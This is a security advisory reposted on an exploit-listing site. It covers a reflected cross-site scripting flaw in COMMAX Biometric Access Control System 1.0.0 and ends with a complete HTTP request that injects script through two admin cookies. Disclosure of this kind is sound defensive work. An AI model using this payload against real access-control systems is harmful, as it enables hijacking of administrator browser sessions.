Advertisement






COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-4101 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-08-17
CPE
cpe:cpe:/a:commax:biometric_access_control_system:1.0.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080063

Below is a copy:

COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting
COMMAX Biometric Access Control System 1.0.0 Cookie Reflected XSS


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0

Summary: Biometric access control system.

Desc: The application is vulnerable to an unauthenticated reflected
cross-site scripting (XSS) vulnerability. Input passed to the Cookies
'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM' is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and JS code in a user's browser session in context of an affected
site.

Tested on: nginx/1.14.0 (Ubuntu)
           MariaDB/10.3.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5660
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5660.php


02.08.2021

--


GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: UA/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=lab"><script>confirm(document.domain)</script>; CMX_ADMIN_LV=8; CMX_COMPLEX_NM=ZSL"><script>confirm(window.origin)</script>; CMX_COMPLEX_IP=2.5.1.0
Connection: close

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.